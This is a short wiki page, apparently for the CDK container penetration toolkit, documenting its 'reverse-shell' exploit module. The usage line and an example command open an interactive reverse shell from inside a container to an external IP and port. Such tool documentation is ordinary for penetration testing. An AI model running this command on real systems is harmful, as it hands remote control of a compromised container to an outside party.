Skip to content

Exploit: reverse shell

cdxy edited this page Nov 24, 2020 · 2 revisions

Exploit: mount-procfs

在容器中反弹shell到远端服务器。

Spawn an interactive reverse shell to remote IP.

Usage

cdk run reverse-shell <ip>:<port>

Example

# inside container
cdk run reverse-shell 39.104.80.49:999

Clone this wiki locally